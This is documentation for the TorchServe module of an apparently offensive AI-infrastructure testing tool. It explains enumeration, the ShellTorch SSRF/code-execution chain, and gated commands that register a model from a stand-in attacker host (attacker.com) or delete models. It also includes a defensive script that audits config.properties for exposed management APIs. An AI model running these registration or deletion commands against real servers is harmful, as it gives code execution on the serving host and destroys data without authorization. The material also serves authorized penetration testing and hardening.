TorchServe
Enumerate and exploit PyTorch TorchServe model serving instances.
Overview
The torchserve module targets TorchServe's three separate HTTP APIs: inference (default port 8080), management (8081), and metrics (8082). The management API is the primary attack surface: it exposes model registration, scaling, and deletion, and until token authorization arrived in TorchServe 0.11 it had no authentication at all, so anyone who can reach port 8081 on an older deployment controls the server. The --target flag points to the management API; --inference-url and --metrics-url override the inference and metrics URLs, which are otherwise derived from the target host with ports 8080 and 8082.
The register subcommand tests the ShellTorch registration vector (CVE-2023-43654, CVE-2024-35195): the management API fetches a model archive (.mar) from a caller-supplied URL and loads it. Because a .mar's handler is ordinary Python that the worker executes when the model loads, a successful registration from an attacker-controlled URL is code execution on the serving host, not just a server-side request.
Subcommands
Read-Only (no --force-exploit required)

| Subcommand | Description |
|---|---|
| enum | List models from management API and check inference health |
| models | Detailed model info (handler, runtime, workers, batch size) |
| metrics | Prometheus metrics from metrics API |
Gated (requires --force-exploit)

| Subcommand | Description |
|---|---|
| predict | Send prediction via inference API |
| register | Register model from URL (ShellTorch SSRF/RCE vector) |
| scale | Scale model workers (proves management write access) |
| unregister | Delete a model (proves destructive access) |
Flags
| Flag | Required | Description |
|---|---|---|
| --target | Yes | Management API URL (default port 8081) |
| --header | No | Custom HTTP headers (for example a management token). Repeatable. |
| --inference-url | No | Override inference API URL (default: derived from target with port 8080) |
| --metrics-url | No | Override metrics API URL (default: derived from target with port 8082) |
| --model | For models, predict, scale, unregister | Model name |
| --payload | For predict | JSON prediction payload |
| --model-url | For register | URL of model archive (.mar) to register |
| --min-workers | For scale | Minimum worker count (default: 1) |
| --force-exploit | For predict, register, scale, unregister | Enables the gated subcommands that write to or execute against the target |
Key Endpoints
Management API (port 8081)
| Endpoint | Method | Purpose |
|---|---|---|
| /models | GET | List all registered models |
| /models/<name> | GET | Detailed model info |
| /models?url=<url> | POST | Register model from URL (SSRF vector) |
| /models/<name>?min_worker=<n> | PUT | Scale workers |
| /models/<name> | DELETE | Unregister model |
Inference API (port 8080)
| Endpoint | Method | Purpose |
|---|---|---|
| /ping | GET | Health check |
| /predictions/<model> | POST | Inference request (TorchServe's path is /predictions/{model_name}, model name after the prefix) |
Metrics API (port 8082)
| Endpoint | Method | Purpose |
|---|---|---|
| /metrics | GET | Prometheus metrics |
ShellTorch Vulnerability
The register subcommand tests the ShellTorch attack chain:
- CVE-2023-43654 -- SSRF via the model registration URL: the default allowed_urls setting let the management API fetch archives from any host, so a registration request makes the server reach internal services and cloud metadata endpoints on the attacker's behalf
- CVE-2024-35195 -- arbitrary code execution through a malicious model archive, since the handler inside a .mar is executed by the worker as soon as the model is loaded
TorchServe fetches the URL server-side before it answers, so the first proof is a DNS or HTTP hit on the host you named in --model-url; that alone confirms the SSRF even if registration then fails (for example because the archive does not exist). A success response means the archive was downloaded and loaded, which is to say its handler code ran on the target. A rejection that names the allowed_urls policy indicates a patched or hardened instance (the allowed_urls check was fixed in 0.8.2); an authentication error indicates token authorization is on. A registered model is a persistent artifact on the target, so record it and remove it with unregister when the test is done.
Examples
```bash
# Enumerate models and health
./aipostex torchserve --target http://127.0.0.1:8081 enum

# Detailed model info
./aipostex torchserve --target http://127.0.0.1:8081 models --model resnet

# Extract metrics
./aipostex torchserve --target http://127.0.0.1:8081 metrics

# Test prediction (gated)
./aipostex torchserve --target http://127.0.0.1:8081 predict \
  --model resnet --payload '{"data": "test"}' --force-exploit

# ShellTorch SSRF test (gated)
./aipostex torchserve --target http://127.0.0.1:8081 register \
  --model-url http://attacker.com/test.mar --force-exploit

# Scale workers (gated)
./aipostex torchserve --target http://127.0.0.1:8081 scale \
  --model resnet --min-workers 2 --force-exploit

# Unregister model (gated)
./aipostex torchserve --target http://127.0.0.1:8081 unregister \
  --model resnet --force-exploit
```
Workflow Progression
```text
discover network (discovers TorchServe on :8080/:8081)
  -> torchserve enum (model listing, health)
  -> torchserve models --model <name> (handler, workers)
  -> torchserve metrics (operational data)
  -> torchserve predict --model <name> (inference test, gated)
  -> torchserve register --model-url <url> (ShellTorch SSRF, gated)
```
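Once the workflow above yields host access, or when writing up the finding for the owners, the same three settings decide whether the registration path is exploitable. The following is an added example (mine, not aipostex's) that audits a TorchServe config.properties for them: a management API bound beyond loopback, an allowed_urls that admits any external host, and token authorization switched off. The key names are TorchServe's; both sample configs are constructed (the 0.0.0.0 bindings mirror the official Docker image's config.properties), and treating an absent allowed_urls as the historical permissive default is an assumption about the version in play.

```python
"""Audit a TorchServe config.properties for ShellTorch-relevant settings.

Added example, not aipostex code. Sample configs below are constructed.
"""
import re
from urllib.parse import urlsplit

# Constructed: all APIs on every interface, no allowed_urls, token auth off.
WEAK_CONFIG = """
inference_address=http://0.0.0.0:8080
management_address=http://0.0.0.0:8081
metrics_address=http://0.0.0.0:8082
model_store=/home/model-server/model-store
disable_token_authorization=true
"""

# Constructed: management and metrics on loopback, archives only from one internal host.
HARDENED_CONFIG = """
inference_address=http://0.0.0.0:8080
management_address=http://127.0.0.1:8081
metrics_address=http://127.0.0.1:8082
allowed_urls=https://models\\.internal\\.example/.*
"""

# TorchServe's historical default; assumption: the target still uses it when the key is absent.
PERMISSIVE_DEFAULT_ALLOWED_URLS = "file://.*|http(s)?://.*"
CANARY_URL = "http://attacker.example/test.mar"  # constructed external archive URL


def parse_properties(text: str) -> dict:
    """Minimal key=value parser for a Java-style properties file (comments and blanks skipped)."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props


def url_allowed(allowed_urls: str, url: str) -> bool:
    """allowed_urls is a comma-separated list of regexes; a URL passes if any matches it in full."""
    for pattern in allowed_urls.split(","):
        pattern = pattern.strip()
        if not pattern:
            continue
        try:
            if re.fullmatch(pattern, url):
                return True
        except re.error:
            continue  # Java-only regex syntax cannot be evaluated here; treat as non-matching
    return False


def audit_config(text: str) -> list:
    """Return (key, finding) pairs for settings that expose the management API."""
    props = parse_properties(text)
    findings = []

    mgmt = props.get("management_address", "http://127.0.0.1:8081")  # code default is loopback
    host = urlsplit(mgmt).hostname or ""
    if host in ("0.0.0.0", "::"):
        findings.append(("management_address",
                         f"management API bound to all interfaces ({mgmt}); any client that reaches it can register models"))

    allowed = props.get("allowed_urls", PERMISSIVE_DEFAULT_ALLOWED_URLS)
    if url_allowed(allowed, CANARY_URL):
        findings.append(("allowed_urls",
                         f"{allowed!r} admits arbitrary external archive URLs such as {CANARY_URL}"))

    if props.get("disable_token_authorization", "false").lower() == "true":
        findings.append(("disable_token_authorization",
                         "management API token authorization is explicitly disabled"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_config(cfg) or "no findings")
```

An absent disable_token_authorization is reported as clean only because 0.11+ enables token auth by default; on a pre-0.11 build there is no token mechanism to disable, so pair this check with the version string from the target and with the allowed_urls result, which is the setting that actually decides whether register succeeds.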